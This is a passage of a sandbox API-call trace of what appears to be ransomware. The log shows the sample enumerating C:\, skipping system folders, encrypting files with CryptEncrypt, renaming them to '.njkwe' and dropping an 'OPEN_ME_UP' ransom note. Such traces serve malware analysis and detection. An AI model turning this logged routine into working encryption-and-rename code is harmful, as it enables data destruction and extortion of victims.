lpFindFileData=0x380fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0065.279] lstrcmpiW (lpString1="BOOTNXT", lpString2="Windows") returned -1 [0065.279] lstrcmpiW (lpString1="BOOTNXT", lpString2="$Recycle.bin") returned 1 [0065.279] lstrcmpiW (lpString1="BOOTNXT", lpString2="System Volume Information") returned -1 [0065.279] lstrcmpiW (lpString1="BOOTNXT", lpString2="Program Files") returned -1 [0065.279] lstrcmpiW (lpString1="BOOTNXT", lpString2="Program Files (x86)") returned -1 [0065.279] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\BOOTNXT") returned 14 [0065.279] StrStrIW (lpFirst="BOOTNXT", lpSrch=".njkwe") returned 0x0 [0065.279] lstrcmpW (lpString1="BOOTNXT", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.279] lstrcmpW (lpString1="BOOTNXT", lpString2="taridd") returned -1 [0065.279] StrCmpNW (lpStr1="\\\\?\\C:\\BOOTNXT", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.279] CreateFileW (lpFileName="\\\\?\\C:\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0065.281] GetTickCount () returned 0x1150b95 [0065.281] GetTickCount () returned 0x1150b95 [0065.281] GetTickCount () returned 0x1150b95 [0065.281] GetTickCount () returned 0x1150b95 [0065.281] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380fc40*, pdwDataLen=0x380fcf0*=0x2c, dwBufLen=0x80 | out: pbData=0x380fc40*, pdwDataLen=0x380fcf0*=0x80) returned 1 [0065.281] GetProcessHeap () returned 0xbe0000 [0065.281] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.281] ReadFile (in: hFile=0x424, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fcf4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fcf4*=0x1, lpOverlapped=0x0) returned 1 [0065.282] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0xffffffff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.282] WriteFile (in: hFile=0x424, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x380fcf4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fcf4*=0x1, lpOverlapped=0x0) returned 1 [0065.283] GetProcessHeap () returned 0xbe0000 [0065.283] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.283] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.283] WriteFile (in: hFile=0x424, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fcf4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fcf4*=0x300, lpOverlapped=0x0) returned 1 [0065.284] WriteFile (in: hFile=0x424, lpBuffer=0x380fc40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fcf4, lpOverlapped=0x0 | out: lpBuffer=0x380fc40*, lpNumberOfBytesWritten=0x380fcf4*=0x80, lpOverlapped=0x0) returned 1 [0065.284] WriteFile (in: hFile=0x424, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fcf4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fcf4*=0x4, lpOverlapped=0x0) returned 1 [0065.284] CloseHandle (hObject=0x424) returned 1 [0065.284] GetProcessHeap () returned 0xbe0000 [0065.285] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc263f8 [0065.285] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\BOOTNXT_r00t_{3sXlE5}.njkwe") returned 34 [0065.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\BOOTNXT" (normalized: "c:\\bootnxt"), lpNewFileName="\\\\?\\C:\\BOOTNXT_r00t_{3sXlE5}.njkwe" (normalized: "c:\\bootnxt_r00t_{3sxle5}.njkwe")) returned 1 [0065.285] GetProcessHeap () returned 0xbe0000 [0065.285] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc263f8 | out: hHeap=0xbe0000) returned 1 [0065.285] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xc4ee267e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4ee267e, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xf1c63cdd, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0065.285] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Windows") returned -1 [0065.285] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="$Recycle.bin") returned 1 [0065.285] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="System Volume Information") returned -1 [0065.285] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Program Files") returned -1 [0065.285] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Program Files (x86)") returned -1 [0065.285] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0065.285] StrStrIW (lpFirst="BOOTSECT.BAK", lpSrch=".njkwe") returned 0x0 [0065.285] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.285] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="taridd") returned -1 [0065.285] StrCmpNW (lpStr1="\\\\?\\C:\\BOOTSECT.BAK", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.285] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.286] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0065.286] lstrcmpiW (lpString1="Documents and Settings", lpString2="Windows") returned -1 [0065.286] lstrcmpiW (lpString1="Documents and Settings", lpString2="$Recycle.bin") returned 1 [0065.286] lstrcmpiW (lpString1="Documents and Settings", lpString2="System Volume Information") returned -1 [0065.286] lstrcmpiW (lpString1="Documents and Settings", lpString2="Program Files") returned -1 [0065.286] lstrcmpiW (lpString1="Documents and Settings", lpString2="Program Files (x86)") returned -1 [0065.286] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Documents and Settings") returned 29 [0065.286] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0065.286] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0065.286] lstrcmpW (lpString1="\\\\?\\C:\\Documents and Settings", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.286] GetProcessHeap () returned 0xbe0000 [0065.286] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc263f8 [0065.286] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Documents and Settings\\*") returned 31 [0065.286] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="", cAlternateFileName="窠Ä￿￿扨@￿￿窠Ä\x05")) returned 0xffffffff [0065.287] GetProcessHeap () returned 0xbe0000 [0065.287] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc263f8 | out: hHeap=0xbe0000) returned 1 [0065.287] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0065.287] lstrcmpiW (lpString1="ESD", lpString2="Windows") returned -1 [0065.287] lstrcmpiW (lpString1="ESD", lpString2="$Recycle.bin") returned 1 [0065.287] lstrcmpiW (lpString1="ESD", lpString2="System Volume Information") returned -1 [0065.287] lstrcmpiW (lpString1="ESD", lpString2="Program Files") returned -1 [0065.287] lstrcmpiW (lpString1="ESD", lpString2="Program Files (x86)") returned -1 [0065.287] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ESD") returned 10 [0065.287] lstrcmpW (lpString1="ESD", lpString2=".") returned 1 [0065.287] lstrcmpW (lpString1="ESD", lpString2="..") returned 1 [0065.287] lstrcmpW (lpString1="\\\\?\\C:\\ESD", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.287] GetProcessHeap () returned 0xbe0000 [0065.287] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc263f8 [0065.287] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ESD\\*") returned 12 [0065.287] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ESD\\*", lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19d60 [0065.290] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.290] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.290] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.290] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.290] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.290] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ESD\\.") returned 12 [0065.290] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.290] FindNextFileW (in: hFindFile=0xc19d60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.290] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.290] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.290] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.290] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.290] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.290] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ESD\\..") returned 13 [0065.290] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.290] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.290] FindNextFileW (in: hFindFile=0xc19d60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0065.291] FindClose (in: hFindFile=0xc19d60 | out: hFindFile=0xc19d60) returned 1 [0065.291] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ESD\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 42 [0065.291] CreateFileW (lpFileName="\\\\?\\C:\\ESD\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\esd\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0065.291] WriteFile (in: hFile=0x424, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380fa74, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380fa74*=0x351, lpOverlapped=0x0) returned 1 [0065.292] CloseHandle (hObject=0x424) returned 1 [0065.292] GetProcessHeap () returned 0xbe0000 [0065.292] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc263f8 | out: hHeap=0xbe0000) returned 1 [0065.292] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3d7ebe9, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0065.292] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Windows") returned -1 [0065.292] lstrcmpiW (lpString1="hiberfil.sys", lpString2="$Recycle.bin") returned 1 [0065.292] lstrcmpiW (lpString1="hiberfil.sys", lpString2="System Volume Information") returned -1 [0065.292] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Program Files") returned -1 [0065.292] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Program Files (x86)") returned -1 [0065.292] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\hiberfil.sys") returned 19 [0065.292] StrStrIW (lpFirst="hiberfil.sys", lpSrch=".njkwe") returned 0x0 [0065.292] lstrcmpW (lpString1="hiberfil.sys", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.292] lstrcmpW (lpString1="hiberfil.sys", lpString2="taridd") returned -1 [0065.292] StrCmpNW (lpStr1="\\\\?\\C:\\hiberfil.sys", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.292] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.375] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0065.375] lstrcmpiW (lpString1="Logs", lpString2="Windows") returned -1 [0065.375] lstrcmpiW (lpString1="Logs", lpString2="$Recycle.bin") returned 1 [0065.375] lstrcmpiW (lpString1="Logs", lpString2="System Volume Information") returned -1 [0065.375] lstrcmpiW (lpString1="Logs", lpString2="Program Files") returned -1 [0065.375] lstrcmpiW (lpString1="Logs", lpString2="Program Files (x86)") returned -1 [0065.375] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs") returned 11 [0065.375] lstrcmpW (lpString1="Logs", lpString2=".") returned 1 [0065.375] lstrcmpW (lpString1="Logs", lpString2="..") returned 1 [0065.375] lstrcmpW (lpString1="\\\\?\\C:\\Logs", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.375] GetProcessHeap () returned 0xbe0000 [0065.375] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc263f8 [0065.375] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Logs\\*") returned 13 [0065.375] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Logs\\*", lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0065.582] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.582] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.582] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.582] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.582] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.582] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\.") returned 13 [0065.582] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.582] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.684] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.684] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.684] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.684] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.684] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.684] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\..") returned 14 [0065.684] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.684] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.684] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5052fa31, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5052fa31, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Application.evtx", cAlternateFileName="APPLIC~1.EVT")) returned 1 [0065.684] lstrcmpiW (lpString1="Application.evtx", lpString2="Windows") returned -1 [0065.684] lstrcmpiW (lpString1="Application.evtx", lpString2="$Recycle.bin") returned 1 [0065.684] lstrcmpiW (lpString1="Application.evtx", lpString2="System Volume Information") returned -1 [0065.684] lstrcmpiW (lpString1="Application.evtx", lpString2="Program Files") returned -1 [0065.684] lstrcmpiW (lpString1="Application.evtx", lpString2="Program Files (x86)") returned -1 [0065.684] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Application.evtx") returned 28 [0065.684] StrStrIW (lpFirst="Application.evtx", lpSrch=".njkwe") returned 0x0 [0065.684] lstrcmpW (lpString1="Application.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.684] lstrcmpW (lpString1="Application.evtx", lpString2="taridd") returned -1 [0065.684] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Application.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.684] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.686] GetTickCount () returned 0x1150d2b [0065.686] GetTickCount () returned 0x1150d2b [0065.686] GetTickCount () returned 0x1150d2b [0065.686] GetTickCount () returned 0x1150d2b [0065.686] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.686] GetProcessHeap () returned 0xbe0000 [0065.686] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.687] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.689] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.689] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.689] GetProcessHeap () returned 0xbe0000 [0065.689] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.689] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.689] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.689] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.690] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.690] CloseHandle (hObject=0x428) returned 1 [0065.693] GetProcessHeap () returned 0xbe0000 [0065.693] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.693] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Application.evtx_r00t_{3sXlE5}.njkwe") returned 48 [0065.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Application.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\application.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.693] GetProcessHeap () returned 0xbe0000 [0065.693] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.693] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505ee5f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505ee5f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="HardwareEvents.evtx", cAlternateFileName="HARDWA~1.EVT")) returned 1 [0065.693] lstrcmpiW (lpString1="HardwareEvents.evtx", lpString2="Windows") returned -1 [0065.693] lstrcmpiW (lpString1="HardwareEvents.evtx", lpString2="$Recycle.bin") returned 1 [0065.694] lstrcmpiW (lpString1="HardwareEvents.evtx", lpString2="System Volume Information") returned -1 [0065.694] lstrcmpiW 